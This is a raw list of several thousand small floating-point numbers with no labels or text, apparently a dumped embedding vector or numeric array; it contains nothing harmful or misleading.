0.026691338047385216, -0.040915898978710175, 0.018362125381827354, 0.03123454377055168, -0.0023747042287141085, 0.018754247575998306, -0.02531214989721775, 0.010526446625590324, -0.027056416496634483, 0.02516341395676136, -0.01822691224515438, -0.005787179805338383, 0.009999110363423824, 0.012649314478039742, 0.0038198090624064207, -0.0028986602555960417, -0.0196872279047966, 0.000710298540070653, 0.00987065676599741, 0.0030862705316394567, 0.0196872279047966, 0.0004943779204040766, 0.018267475068569183, 0.0014594712993130088, 0.027435017749667168, -0.020971765741705894, -0.02807052619755268, -0.02360844798386097, -0.026745423674583435, -0.031613145023584366, -0.020620208233594894, 0.016306865960359573, 0.008315689861774445, -0.03815752640366554, 0.013690466061234474, 0.03255964443087578, -0.0004664899315685034, 0.003405714640393853, -0.015414450317621231, -0.05543793365359306, -0.014102869667112827, 0.010736029595136642, -0.010235736146569252, 0.003109932877123356, -0.033127546310424805, 0.00041409433470107615, -0.027854181826114655, 0.01687476597726345, -0.014359777793288231, -0.007463838905096054, -0.005814222618937492, 0.021823616698384285, -0.008559076115489006, 0.004762929864227772, 0.0005911407642997801, 0.00964079238474369, -0.039807140827178955, -0.01837564818561077, -0.02958492748439312, 0.0016006013611331582, -0.008281886577606201, 0.004225452430546284, 0.019552012905478477, 0.0006304375128820539, -0.02934154123067856, -0.014805985614657402, -0.02290533296763897, -0.010391232557594776, 0.009532620199024677, -0.0009693187894299626, -0.009701638482511044, -0.026934724301099777, 0.006662693340331316, -0.0365619957447052, -0.01182450633496046, 0.003082890063524246, 0.027313323691487312, 0.027394453063607216, -0.0066052270121872425, -0.023081110790371895, 0.017740139737725258, 0.031721316277980804, 0.03291120380163193, -0.010289821773767471, 0.006713398732244968, -0.004840678069740534, 0.020579643547534943, 0.003065988188609481, -0.021377408877015114, -0.01696941629052162, -0.03028804250061512, -0.016442080959677696, -0.024541428312659264, 0.00387389468960464, -0.018646076321601868, 0.03180244565010071, -0.021472059190273285, -0.002001174259930849, -0.01394061278551817, 0.028800683096051216, 0.006943263579159975, 0.010945611633360386, 0.026488516479730606, -0.02124219387769699, -0.008072304539382458, -0.025203978642821312, 0.005841265432536602, -0.018267475068569183, 0.021877702325582504, 0.025136372074484825, -0.032721903175115585, -0.01887594163417816, -0.01062785740941763, 0.0013910189736634493, 0.0006988898385316133, -0.00008165686449501663, -0.03034212812781334, 0.001149323070421815, 0.04981301352381706, -0.011865070089697838, -0.01978187821805477, -0.013845962472259998, 0.03177540376782417, 0.005131389480084181, -0.01456259936094284, -0.036291565746068954, 0.005046880338340998, -0.027462059631943703, -0.010587293654680252, 0.01894354820251465, 0.02155318669974804, 0.0030254239682108164, -0.012128738686442375, -0.004820396192371845, 0.004546586889773607, 0.015157543122768402, 0.02446029894053936, -0.0032857118640094995, -0.013176650740206242, -0.02466312050819397, 0.03750849515199661, -0.007754550315439701, 0.03466899320483208, -0.04037504270672798, 0.014427384361624718, 0.0046108136884868145, -0.0031183839309960604, 0.0044181328266859055, 0.023135196417570114, 0.008153432980179787, -0.0017003220273181796, -0.009654313325881958, 0.015738965943455696, -0.017740139737725258, -0.006371982395648956, 0.009938264265656471, -0.0011805914109572768, 0.011466187424957752, -0.008052022196352482, 0.0009549522656016052, 0.004739267285913229, 0.012297756969928741, 0.006740441545844078, -0.0026485135313123465, 0.04445851966738701, -0.017510274425148964, 0.023567883297801018, 0.006226626690477133, 0.01296030730009079, -0.015076413750648499, -0.00961374957114458, 0.0008345268433913589, 0.02858434058725834, -0.0009870657231658697, -0.033073462545871735, 0.03380361944437027, -0.00032831766293384135, -0.008619923144578934, -0.006682975683361292, 0.01998469978570938, -0.015252192504703999, -0.01833508349955082, -0.005340971983969212, -0.026731902733445168, -0.029044069349765778, -0.01978187821805477, -0.01077659334987402, 0.058899424970149994, -0.017266888171434402, -0.007321863900870085, -0.01308200042694807, -0.0100193927064538, 0.0028597861528396606, 0.002714430680498481, 0.009275713004171848, -0.012683117762207985, -0.00704467436298728, 0.018848897889256477, -0.005807461682707071, -0.00704467436298728, 0.010790115222334862, 0.0067032575607299805, -0.018700161948800087, 0.015563186258077621, -0.002729642204940319, 0.003038945375010371, 0.023270411416888237, -0.04299820214509964, 0.0065815644338727, 0.007970893755555153, -0.02586652897298336, 0.039049942046403885, -0.005733093712478876, -0.009201345033943653, -0.004100379068404436, -0.02396000549197197, 0.011635205708444118, -0.017794225364923477, -0.0015203177463263273, -0.00009116413275478408, 0.00355276046320796, -0.012162541970610619, -0.007903286255896091, -0.008809222839772701, -0.02934154123067856, 0.006382123101502657, -0.017753660678863525, -0.010080238804221153, 0.002269912976771593, -0.0023797748144716024, -0.010952373035252094, -0.022432081401348114, -0.009776006452739239, 0.01007347833365202, 0.00881598424166441, -0.012047610245645046, -0.010499403811991215, 0.010465600527822971, -0.01763196848332882, 0.022080523893237114, -0.0024811855982989073, 0.03099115751683712, 0.010215453803539276, 0.0028209120500832796, 0.026704858988523483, -0.012601989321410656, -0.00783567875623703, 0.010864483192563057, 0.007091999519616365, -0.023013504222035408, 0.012169302441179752, -0.010418275371193886, 0.022621382027864456, -0.029449712485074997, -0.019376235082745552, -0.0013589054578915238, 0.010283061303198338, -0.004675040487200022, 0.010438557714223862, 0.017293931916356087, -0.011790702119469643, 0.00005952606079517864, 0.0018963830079883337, 0.0027025993913412094, 0.04616222158074379, -0.030450299382209778, -0.0025369615759700537, 0.03807639703154564, 0.024622555822134018, -0.012372124940156937, 0.0005788870039395988, -0.025082284584641457, 0.011750138364732265, -0.01667194440960884, -0.03239738941192627, 0.0031166935805231333, -0.019051719456911087, 0.018105218186974525, 0.01833508349955082, 0.03583183512091637, 0.029098154976963997, -0.005013076588511467, -0.014603163115680218, -0.0038130481261759996, -0.0027955593541264534, -0.004614193923771381, -0.006591705605387688, -0.012852136045694351, -0.0029189425986260176, 0.0019234259380027652, -0.02094472199678421, -0.006997349206358194, -0.0043471455574035645, 0.01687476597726345, 0.005729713477194309, 0.0008019908564165235, -0.0030338747892528772, -0.00015433464432135224, 0.01252762135118246, -0.003005141858011484, -0.0020823029335588217, -0.0061556389555335045, -0.0019437080482020974, 0.014021741226315498, -0.004722365643829107, 0.0035629014018923044, -0.025190457701683044, -0.027245717123150826, -0.024095220491290092, -0.0020907537546008825, 0.009012044407427311, 0.02752966806292534, 0.0014239774318411946, 0.0028209120500832796, 0.009769245982170105, 0.03350614756345749, 0.008734854869544506, 0.03169427439570427, 0.0002109557099174708, 0.012277474626898766, 0.014927677810192108, 0.017185760661959648, -0.008755137212574482, 0.013169890269637108, -0.01842973381280899, -0.011696051806211472, -0.00786272156983614, -0.03299233317375183, -0.005564075894653797, 0.006794527638703585, 0.026785988360643387, -0.005594498943537474, 0.009099934250116348, -0.005073923151940107, -0.017807746306061745, -0.0012659454951062799, 0.04605405032634735, -0.021174587309360504, -0.02993648499250412, 0.002699218923225999, -0.006760723888874054, 0.007734267972409725, 0.0035324781201779842, -0.0015896152472123504, -0.003921219613403082, 0.006017044186592102, -0.004414752591401339, -0.006392264273017645, 0.0028513353317976, 0.017713095992803574, 0.002543722279369831, -0.013771594502031803, 0.011256605386734009, 0.008417101576924324, -0.04797409474849701, -0.028638426214456558, -0.020579643547534943, -0.004840678069740534, -0.03783300891518593, -0.0028006299398839474, -0.006801288109272718, 0.014021741226315498, 0.010992936789989471, 0.011912395246326923, 0.031207501888275146, 0.014778941869735718, -0.013643140904605389, 0.00730834249407053, -0.001645391108468175, 0.016590816900134087, 0.024933548644185066, 0.057493194937705994, -0.001913284882903099, 0.013683704659342766, -0.009086412377655506, -0.02229686640202999, 0.0071528456173837185, 0.01024925708770752, 0.04956962540745735, -0.013359189964830875, -0.035074636340141296, 0.00954614207148552, 0.005138149950653315, 0.005668866913765669, -0.0016732790973037481, 0.01010052114725113, 0.008444144390523434, 0.02506876364350319, -0.0058987317606806755, 0.015400928445160389, -0.0005738164181821048, 0.010891526006162167, -0.03907698392868042, 0.011006458662450314, 0.0012515790294855833, -0.016901809722185135, 0.013812159188091755, -0.004549967125058174, -0.0036271284334361553, -0.02525806427001953, 0.0014273577835410833, 0.002682317281141877, 0.006033945828676224, -0.007673421408981085, -0.004756169393658638, -0.004306580871343613, -0.009133737534284592, -0.0026569643523544073, 0.01964666321873665, 0.00015401773271150887, 0.008660486899316311, 0.0011341114295646548, 0.00853879377245903, 0.031072286888957024, -0.029774228110909462, -0.009174302220344543, 0.006186062470078468, 0.0033786718267947435, -0.016807159408926964, -0.0028107708785682917, -0.02335154078900814, -0.00989769957959652, 0.006530859041959047, 0.005111107137054205, -0.018253954127430916, 0.029206326231360435, 0.0006760723772458732, -0.016049958765506744, -0.03923924267292023, -0.004654758144170046, -0.0015346843283623457, 0.018510861322283745, -0.00017028572619892657, -0.009789528325200081, 0.004752788692712784, 0.0024372409097850323, 0.03537210822105408, -0.02070133574306965, 0.03902289643883705, -0.029611971229314804, 0.004725745879113674, -0.021485580131411552, 0.021580230444669724, 0.026813030242919922, 0.004110520239919424, 0.01833508349955082, -0.01888946257531643, 0.03350614756345749, -0.013541730120778084, -0.003941501956433058, -0.00884302705526352, -0.026339780539274216, 0.03761666640639305, -0.011080826632678509, -0.010256018489599228, -0.009431209415197372, -0.026447951793670654, 0.005543793551623821, 0.014305691234767437, -0.01502232812345028, 0.018997633829712868, -0.02329745516180992, 0.024284519255161285, 0.011614923365414143, -0.00323331612162292, -0.011810984462499619, 0.003674453357234597, 0.0005395902553573251, 0.01167577039450407, -0.005547173786908388, -0.02757023088634014, -0.014427384361624718, -0.020322736352682114, -0.020985286682844162, 0.002200615592300892, 0.0027059796266257763, 0.003826569765806198, -0.0014036953216418624, 0.008856547996401787, 0.002104275394231081, -0.01252762135118246, 0.0013022844213992357, 0.022837724536657333, 0.012541142292320728, -0.012189584784209728, -0.009241909720003605, -0.025136372074484825, -0.01928158476948738, 0.03255964443087578, 0.005905492231249809, -0.0214450154453516, 0.004130802117288113, 0.019714269787073135, -0.0014814436435699463, -0.01531980000436306, -0.016536731272935867, -0.04556727781891823, 0.004898144397884607, 0.011973242275416851, 0.002739783376455307, -0.035480279475450516, -0.011628445237874985, -0.004813635256141424, -0.017888875678181648, 0.014684292487800121, -0.01223014947026968, 0.010431797243654728, 0.0033550092484802008, -0.007605814374983311, 0.009336560033261776, -0.0007166367140598595, 0.02671837992966175, 0.01438682060688734, -0.00509758573025465, 0.00020725844660773873, 0.00751116406172514, -0.015008807182312012, 0.025582579895853996, 0.019268063828349113, 0.014778941869735718, 0.01187859196215868, -0.0071596065536141396, -0.004451936576515436, 0.017591403797268867, 0.0046108136884868145, -0.015793051570653915, 0.013318626210093498, 0.00393136078491807, 0.04199761524796486, -0.0030592274852097034, 0.012297756969928741, 0.0008205828489735723, -0.01554966438561678, 0.007903286255896091, 0.009701638482511044, 0.002367943525314331, -0.04691942408680916, -0.015752486884593964, -0.005841265432536602, -0.01200028508901596, 0.01943032070994377, -0.018199868500232697, 0.004986033774912357, 0.0004795888380613178, 0.011871831491589546, -0.01039799302816391, -0.019011154770851135, -0.0520305298268795, 0.028395039960741997, -0.02290533296763897, -0.02531214989721775, 0.023784225806593895, 0.004864340648055077, 0.018497340381145477, -0.00806554313749075, -0.007903286255896091, 0.02174248732626438, 0.014873592182993889, 0.00853879377245903, -0.00010162212856812403, -0.004164605867117643, -0.02240503951907158, -0.008944437839090824, 0.03396587818861008, -0.0026789368130266666, -0.013156368397176266, -0.012121978215873241, 0.009945024736225605, -0.022621382027864456, -0.020174000412225723, -0.0058716884814202785, -0.01903819851577282, -0.027435017749667168, -0.004675040487200022, -0.003951643127948046, 0.008498230017721653, -0.000692129076924175, 0.0071528456173837185, -0.02692120149731636, -0.02470368519425392, 0.01707758754491806, -0.0182809978723526, -0.001325101824477315, 0.02090415731072426, 0.006530859041959047, -0.028205739334225655, 0.0001225381129188463, -0.02310815453529358, 0.03961784020066261, -0.005760136526077986, 0.016306865960359573, 0.008430622518062592, -0.00620296411216259, 0.00372853921726346, 0.002019766252487898, 0.013798637315630913, 0.016144609078764915, 0.03780596703290939, -0.004793353378772736, -0.0004394470597617328, -0.021377408877015114, -0.046540822833776474, 0.01702350191771984, -0.011966480873525143, 0.012967068701982498, 0.010303342714905739, 0.02496059238910675, 0.011925917118787766, 0.006851993501186371, -0.002775277243927121, 0.005111107137054205, 0.010533208027482033, -0.01883537694811821, 0.02033625729382038, -0.014156955294311047, -0.008254843764007092, 0.011993523687124252, -0.007849200628697872, 0.016739552840590477, 0.020214565098285675, 0.0066153681837022305, -0.005418720189481974, -0.005770277697592974, -0.004867721349000931, -0.010499403811991215, 0.006659313105046749, -0.0028006299398839474, 0.009417688474059105, -0.015752486884593964, -0.009032326750457287, -0.007328624837100506, -0.022067002952098846, -0.016739552840590477, -0.03255964443087578, 0.013710747472941875, -0.011040261946618557, -0.024636076763272285, 0.03380361944437027, -0.02020104229450226, 0.01602291502058506, 0.007639618124812841, 0.0029324640054255724, 0.009086412377655506, 0.02601526491343975, -0.006449730601161718, -0.01959257759153843, 0.010729269124567509, 0.0025504829827696085, -0.004478979390114546, 0.024892985820770264, 0.0001504261017544195, 0.0048744818195700645, 0.006280712317675352, -0.017118152230978012, -0.006557902321219444, 0.002315548015758395, -0.016590816900134087, -0.0005628302460536361, 0.005226039327681065, -0.010878005065023899, -0.011466187424957752, 0.010377710685133934, -0.01907876320183277, 0.0007969203288666904, -0.0020180761348456144, -0.0025859768502414227, -0.010364189743995667, -0.0011434074258431792, 0.01378511544317007, -0.024676641449332237, 0.01576600782573223, -0.0128115713596344, 0.023216325789690018, 0.026907680556178093, 0.011209280230104923, 0.011628445237874985, 0.00393136078491807, -0.005384916439652443, -0.00521251792088151, 0.01561727188527584, -0.001859199022874236, 0.0027718967758119106, 0.02290533296763897, 0.010803637094795704, 0.020971765741705894, 0.0004483204975258559, -0.013670183718204498, -0.002445691730827093, 0.01235184259712696, -0.0006046622293069959, -0.01874072663486004, 0.028097568079829216, 0.01476542092859745, 0.010905047878623009, 0.005743234883993864, 0.016604337841272354, -0.004715604707598686, -0.0021363887935876846, 0.004837297834455967, -0.023838311433792114, 0.007233974523842335, 0.006375362630933523, 0.012669596821069717, -0.014305691234767437, -0.012737203389406204, 0.0010698845144361258, 0.011452666483819485, 0.008761897683143616, -0.003326276084408164, 0.005496468394994736, 0.008890352211892605, -0.01464372780174017, -0.006287473253905773, -0.00424573477357626, -0.011662248522043228, -0.009762485511600971, -0.005002935416996479, 0.006919601000845432, 0.01768605411052704, 0.006486914586275816, -0.013663423247635365, -0.0057060508988797665, -0.0027059796266257763, 0.010479121468961239, -0.004553347360342741, 0.006990588270127773, -0.027597274631261826, -0.013359189964830875, -0.035074636340141296, 0.016536731272935867, -0.008937676437199116, -0.004675040487200022, -0.015698401257395744, 0.029747184365987778, -0.007734267972409725, 0.0014248224906623363, 0.007977654226124287, -0.010986176319420338, -0.0007533981697633862, -0.015806572511792183, -0.012588467448949814, 0.010114043019711971, 0.00801145751029253, 0.013521447777748108, 0.00733538530766964, -0.0009870657231658697, 0.007254256866872311, -0.012865656986832619, -0.009133737534284592, 0.020971765741705894, -0.02053907886147499, 0.013954133726656437, -0.009093173779547215, 0.004654758144170046, 0.006902698893100023, -0.0003910656087100506, -0.00006000142457196489, -0.009782766923308372, 0.0031961321365088224, 0.013217215426266193, -0.005736473947763443, -0.015833614394068718, 0.0034614906180649996, -0.01657729409635067, -0.014319213107228279, 0.0013132706517353654, -0.025880049914121628, -0.009099934250116348, 0.01728041097521782, -0.0047967336140573025, 0.012263952754437923, -0.000733538530766964, -0.00209751445800066, -0.005837885197252035, -0.004989414010196924, -0.005232800263911486, -0.0014374989550560713, 0.016063479706645012, 0.015279236249625683, -0.01598235033452511, 0.024135783314704895, 0.010391232557594776, -0.0014687672955915332, -0.007470599841326475, -0.003711637342348695, -0.013041436672210693, 0.02466312050819397, -0.007626096252351999, 0.02947675622999668, -0.014156955294311047, -0.01696941629052162, -0.015482057817280293, -0.0032164142467081547, 0.01678011566400528, -0.00964079238474369, -0.03218104690313339, -0.012155781500041485, 0.007876243442296982, -0.010039675049483776, -0.0015769387828186154, 0.008822744712233543, 0.024176348000764847, -0.018091697245836258, 0.02390591986477375, -0.013602576218545437, 0.0017459569498896599, -0.013041436672210693, 0.0041443235240876675, -0.0031876813154667616, 0.020782465115189552, -0.0071596065536141396, -0.01458964217454195, 0.009674595668911934, 0.00759905343875289, -0.017185760661959648, 0.018957069143652916, -0.012574946507811546, 0.015238671563565731, 0.004086857661604881, -0.0051584322936832905, 0.029098154976963997, -0.004969132132828236, 0.044079918414354324, 0.0036710731219500303, -0.01529275719076395, -0.007430035620927811, 0.007585532031953335, -0.007112281396985054, -0.03250556066632271, -0.01423808466643095, 0.0012794670183211565, 0.0069770668633282185, 0.019808920100331306, 0.02547440677881241, 0.010215453803539276, 0.002540342044085264, 0.023324497044086456, 0.006892557721585035, 0.014833028428256512, -0.005820983089506626, 0.011973242275416851, 0.009857134893536568, -0.0028699273243546486, -0.002225968288257718, -0.00419502891600132, -0.024379169568419456, -0.015455015003681183, -0.0019115946488454938, -0.001379187684506178, 0.004519544076174498, 0.005885209888219833, 0.011925917118787766, 0.01461668498814106, -0.009066130965948105, 0.015414450317621231, 0.008221040479838848, -0.004749408457428217, -0.00649367505684495, 0.024068176746368408, -0.009654313325881958, 0.009559663943946362, -0.01458964217454195, -0.004360666964203119, 0.0022732934448868036, -0.012169302441179752, -0.017185760661959648, 0.0071528456173837185, -0.0031335954554378986, 0.0065274788066744804, -0.00128115713596344, 0.006970306392759085, -0.02355436235666275, -0.01502232812345028, -0.010161368176341057, -0.017456188797950745, -0.00614211754873395, -0.005205757450312376, -0.0034226165153086185, -0.019322149455547333, 0.02255377545952797, -0.0029865498654544353, 0.008112868294119835, -0.027543189004063606, 0.0024879463016986847, 0.01822691224515438, 0.012223388999700546, -0.0039753057062625885, 0.029206326231360435, 0.0022479407489299774, -0.013981176540255547, 0.02299998328089714, -0.013447079807519913, 0.016563773155212402, -0.0042322129011154175, 0.0016428559320047498, 0.017009980976581573, -0.030369171872735023, 0.01838916912674904, -0.018118739128112793, 0.009904460050165653, 0.029422670602798462, 0.002313857665285468, -0.019322149455547333, 0.012439731508493423, -0.011513512581586838, -0.015306279063224792, 0.022175174206495285, -0.005902111995965242, 0.012514099478721619, 0.010188410989940166, 0.005543793551623821, -0.013426797464489937, -0.025285108014941216, 0.005141530651599169, -0.0323433019220829, -0.016753073781728745, 0.01403526309877634, -0.007504403591156006, 0.006811429280787706, 0.018253954127430916, -0.00943797081708908, -0.000025009396267705597, -0.01421104185283184, -0.015103457495570183, -0.026948245242238045, -0.0062536695040762424, 0.013210454024374485, 0.01874072663486004, -0.007916807197034359, -0.00503673916682601, -0.015711922198534012, -0.00710552092641592, -0.002902040723711252, -0.004370808135718107, 0.004002348519861698, 0.0008484708378091455, 0.0015448253834620118, -0.025893572717905045, 0.00928923487663269, 0.0014028501464053988, 0.023676054552197456, 0.00387389468960464, 0.03266781568527222, -0.0013546800473704934, 0.020863594487309456, 0.021985873579978943, 0.008302168920636177, -0.010066717863082886, 0.021120501682162285, 0.022716032341122627, -0.009742203168570995, 0.013061718083918095, 0.0005467735463753343, 0.0001647926401346922, -0.015360364690423012, -0.01240592822432518, -0.006679594982415438, 0.006760723888874054, 0.0026924582198262215, 0.008342733606696129, 0.005922393873333931, 0.00999234989285469, 0.0013656661612913013, 0.005100965965539217, -0.008349494077265263, 0.008234561420977116, 0.007950611412525177, 0.005202377215027809, -0.02631273679435253, 0.009025566279888153, 0.030612558126449585, 0.022377995774149895, -0.013183411210775375, 0.0037048766389489174, 0.001069039455614984, 0.009187824092805386, -0.001203408814035356, -0.005384916439652443, -0.0200387854129076, 0.004617574159055948, 0.0005987465847283602, -0.013825680129230022, -0.024798335507512093, -0.014319213107228279, 0.007091999519616365, 0.001975821563974023, 0.008971480652689934, -0.0017391962464898825, -0.033668406307697296, 0.011385058984160423, 0.021161066368222237, 0.008254843764007092, 0.0011755208251997828, -0.0036507907789200544, 0.01702350191771984, 0.012270714156329632, -0.007713986095041037, -0.004813635256141424, 0.002548792865127325, -0.02381126955151558, 0.011709573678672314, -0.03845499828457832, 0.020430907607078552, 0.004171366803348064, -0.01514402125030756, -0.004458697512745857, 0.012534381821751595, 0.016212215647101402, -0.010918568819761276, 0.016915330663323402, -0.00416798610240221, 0.0020028643775731325, -0.04486416280269623, 0.005760136526077986, -0.023946484550833702, -0.013967655599117279, -0.017970003187656403, -0.01517106406390667, -0.006497055757790804, -0.002367943525314331, 0.0027330226730555296, 0.015211628749966621, -0.018794812262058258, 0.012892700731754303, 0.00713256374001503, -0.013758072629570961, 0.013967655599117279, -0.011303930543363094, -0.006246909033507109, 0.007781593129038811, 0.00459729228168726, 0.006135357078164816, -0.0045060222037136555, 0.014170477166771889, 0.006740441545844078, 0.011574359610676765, 0.003623747965320945, -0.008951198309659958, 0.02771896682679653, -0.01872720569372177, -0.012189584784209728, 0.04018574208021164, -0.0015558116137981415, -0.024379169568419456, 0.00288175861351192, -0.007558489218354225, -0.005949437152594328, -0.0021735727787017822, 0.006304374895989895, -0.00567562784999609, -0.026853594928979874, -0.0037014964036643505, 0.014684292487800121, -0.023283932358026505, 0.0014062306145206094, -0.026055829599499702, 0.00916754174977541, 0.009079651907086372, -0.0021262476220726967, 0.00608803192153573, 0.0051854751072824, -0.018294518813490868, 0.005026597995311022, -0.0024676641914993525, -0.007855961099267006, -0.023324497044086456, 0.008275126107037067, 0.015509100630879402, -0.019159890711307526, 0.020011741667985916, 0.009769245982170105, -0.014305691234767437, 0.01642855815589428, -0.0021803334821015596, -0.0006486069178208709, 0.00010384049528511241, -0.028259824961423874, -0.007450317498296499, -0.01909228414297104, -0.030801856890320778, 0.026502037420868874, 0.020525557920336723, 0.007781593129038811, 0.0015296137426048517, 0.011317451484501362, -0.022242780774831772, 0.010668422095477581, -0.011195758357644081, 0.009823331609368324, 0.004445176105946302, 0.021756010130047798, 0.005533652380108833, -0.006787766702473164, -0.017158716917037964, -0.018091697245836258, 0.012804810889065266, 0.00821427907794714, -0.009850374422967434, -0.00468518165871501, 0.009931502863764763, 0.005168573465198278, 0.018902983516454697, 0.012858896516263485, -0.007504403591156006, -0.0064362091943621635, 0.0073556676506996155, 0.01822691224515438, 0.018646076321601868, 0.02120162919163704, 0.005371395032852888, 0.011770419776439667, -0.007402992807328701, -0.011303930543363094, -0.017645489424467087, -0.010235736146569252, -0.026204565539956093, 0.004458697512745857, 0.004928567446768284, 0.0019099045312032104, 0.01243297103792429, 0.007233974523842335, -0.039509668946266174, 0.008295408450067043, 0.005168573465198278, -0.022891810163855553, -0.0186325553804636, -0.0002847955038305372, 0.005263223312795162, -0.026529081165790558, -0.004455316811800003, 0.006544380448758602, -0.009566424414515495, -0.006250289268791676, 0.005956197623163462, -0.004661519080400467, 0.01859199069440365, 0.005804081447422504, -0.0030778194777667522, -0.0028969701379537582, -0.0077951145358383656, -0.0009718540241010487, -0.01737505942583084, 0.0070717171765863895, 0.02120162919163704, 0.0006904389010742307, 0.00839005783200264, -0.018957069143652916, -0.009208105504512787, -0.018321560695767403, 0.012676357291638851, 0.0020434288308024406, -0.010992936789989471, 0.006250289268791676, -0.014008219353854656, 0.017009980976581573, -0.013088760897517204, -0.005313928704708815, -0.009072891436517239, 0.006304374895989895, 0.011533794924616814, -0.0014839789364486933, 0.02575835771858692, -0.012541142292320728, -0.006050847936421633, -0.010418275371193886, -0.012270714156329632, -0.000715369067620486, -0.027435017749667168, 0.011817744933068752, -0.012791289947926998, -0.019930614158511162, -0.026109915226697922, -0.01202732790261507, 0.013649901375174522, -0.002236109459772706, -0.005834504496306181, -0.0004352215910330415, -0.006618748418986797, -0.004462077748030424, -0.006652552168816328, -0.007565250154584646, 0.004252495244145393, -0.006300994660705328, -0.0033482485450804234, 0.0010774903930723667, 0.006858754437416792, -0.023040546104311943, 0.0075314464047551155, 0.006855373736470938, -0.02912519872188568, 0.00739623187109828, -0.008761897683143616, 0.002724571619182825, -0.021891223266720772, 0.038644298911094666, 0.002775277243927121, -0.003657551482319832, -0.006246909033507109, 0.009377123787999153, 0.01546853594481945, 0.006246909033507109, 0.022540252655744553, 0.004560108296573162, -0.003312754677608609, 0.015427972190082073, -0.0013098901836201549, -0.004455316811800003, -0.0005252237315289676, 0.011817744933068752, -0.014129912480711937, 0.009525859728455544, -0.018348604440689087, -0.0006743822013959289, -0.010059957392513752, 0.0019724410958588123, 0.013325386680662632, 0.013900048099458218, 0.022323910146951675, -0.004022630862891674, 0.019579056650400162, -0.016807159408926964, 0.0032941626850515604, -0.018673120066523552, 0.0026738662272691727, 0.025501450523734093, 0.006131976377218962, 0.000580999709200114, 0.0012625651434063911, -0.003674453357234597, -0.0012532691471278667, 0.0022918854374438524, 0.010093760676681995, 0.004725745879113674, 0.0189841128885746, -0.0048744818195700645, -0.017266888171434402, 0.009525859728455544, 0.0012389026815071702, 0.018362125381827354, -0.03299233317375183, 0.01713167503476143, -0.02331097610294819, 0.016590816900134087, 0.014143434353172779, 0.015062892809510231, -0.023621968924999237, 0.016847724094986916, -0.00928923487663269, -0.0010327005293220282, -0.01187859196215868, -0.01278452854603529, -0.011817744933068752, 0.0009743893169797957, -0.01807817630469799, -0.015711922198534012, 0.0037014964036643505, -0.0041612256318330765, 0.017009980976581573, -0.008599640801548958, -0.005476186517626047, -0.010242496617138386, -0.007551728747785091, -0.0164826437830925, -0.017320973798632622, -0.02290533296763897, 0.0017915918724611402, 0.01220310665667057, -0.013703987002372742, -0.0038907965645194054, 0.01549557875841856, -0.005628302693367004, 0.014373298734426498, -0.035642534494400024, 0.018159303814172745, 0.02455494925379753, 0.02094472199678421, 0.030125785619020462, -0.014021741226315498, -0.0049725123681128025, 0.02345971204340458, 0.004942089319229126, 0.01622573658823967, 0.0012912983074784279, 0.01918693445622921, 0.005658725742250681, -0.009323038160800934, 0.001007347833365202, -0.0049623711965978146, 0.0032654295209795237, 0.010763072408735752, -0.006385503802448511, 0.010283061303198338, -0.016739552840590477, -0.027543189004063606, 0.007139324210584164, -0.008748376742005348, 0.01406230591237545, -0.016901809722185135, -0.006588325370103121, -0.01611756533384323, -0.0009397406247444451, 0.013927090913057327, 0.009728681296110153, -0.01426512748003006, -0.021674880757927895, -0.01652320846915245, 0.0055302721448242664, -0.02416282705962658, -0.005266604013741016, 0.022337431088089943, 0.009789528325200081, 0.005297027062624693, -0.007254256866872311, -0.003796146484091878, -0.001004812540486455, 0.026529081165790558, -0.008897112682461739, 0.006280712317675352, -0.010837440378963947, -0.03150497376918793, 0.0063314177095890045, 0.02240503951907158, 0.0038468518760055304, -0.01408934872597456, -0.007058195769786835, -0.0012439731508493423, 0.01508993562310934, -0.01546853594481945, -0.02823278307914734, -0.008112868294119835, 0.01376483403146267, -0.005726333241909742, -0.0002786685945466161, -0.006574803963303566, -0.015901222825050354, 0.01922749914228916, 0.019024677574634552, -0.005384916439652443, 0.013420036993920803, 0.009187824092805386, -0.013291583396494389, 0.003256978699937463, 0.004614193923771381, -0.0017129983752965927, -0.011669008992612362, 0.006794527638703585, 0.007551728747785091, -0.008863309398293495, -0.006135357078164816, -0.04383653402328491, 0.000681565492413938, -0.012189584784209728, 0.013156368397176266, 0.0001811662659747526, 0.02320280484855175, 0.0027769673615694046, -0.000012333039194345474, -0.0009693187894299626, 0.008450904861092567, 0.007125802803784609, -0.0015608820831403136, -0.012750725261867046, 0.012121978215873241, -0.007910046726465225, -0.005249701905995607, -0.0022614621557295322, -0.0069060795940458775, 0.00375558203086257, 0.004276157822459936, 0.0015820093685761094, -0.01868664100766182, -0.0003169089322909713, -0.0203903429210186, -0.003256978699937463, -0.0061623998917639256, -0.014454427175223827, -0.00678100623190403, -0.004228832665830851, -0.003674453357234597, 0.013345669023692608, 0.01733449660241604, 0.008072304539382458, -0.014143434353172779, 0.009911221452057362, -0.0042322129011154175, 0.01170281320810318, -0.011925917118787766, -0.009498816914856434, 0.011777181178331375, 0.013710747472941875, 0.0015617272583767772, -0.00989769957959652, -0.001133266370743513, 0.01202732790261507, 0.019051719456911087, 0.004776451271027327, -0.010796875692903996, -0.02385183423757553, 0.011418862268328667, -0.026150479912757874, 0.01051968615502119, 0.011865070089697838, 0.010147846303880215, 0.02345971204340458, -0.012338320724666119, 0.010634618811309338, -0.019619621336460114, -0.004911665804684162, 0.030666643753647804, -0.0004711379297077656, -0.011385058984160423, -0.002540342044085264, -0.0042389738373458385, -0.023784225806593895, 0.012601989321410656, 0.036291565746068954, 0.03661607950925827, -0.007166367489844561, 0.0058007012121379375, 0.005726333241909742, 0.008559076115489006, 0.00021011062199249864, 0.009701638482511044, 0.005029978696256876, 0.008376536890864372, 0.006862134672701359, 0.006578184198588133, 0.008349494077265263, 0.023635489866137505, -0.012588467448949814, 0.0021803334821015596, 0.01356201246380806, -0.005668866913765669, -0.020025264471769333, -0.005844645667821169, 0.01922749914228916, 0.026042308658361435, 0.00372853921726346, 0.017767181620001793, -0.012845375575125217, -0.026840073987841606, -0.02823278307914734, 0.027746010571718216, 0.005425480660051107, -0.0007364963530562818, 0.0036169872619211674, 0.009485295973718166, -0.007463838905096054, -0.026610208675265312, 0.005310548469424248, -0.006402405444532633, -0.008288647048175335, 0.0018270856235176325, 0.009972067549824715, -0.0023544221185147762, 0.013663423247635365, -0.007997936569154263, -0.0012946786591783166, 0.01944384165108204, 0.02788122557103634, -0.021688401699066162, 0.01953849196434021, -0.005743234883993864, 0.0029611969366669655, 0.0018034230452030897, -0.015427972190082073, 0.005408579017966986, 0.0008303013746626675, 0.00047705357428640127, 0.0029916202183812857, -0.01467077061533928, -0.012034088373184204, -0.0034040245227515697, 0.005242941435426474, -0.002220897702500224, 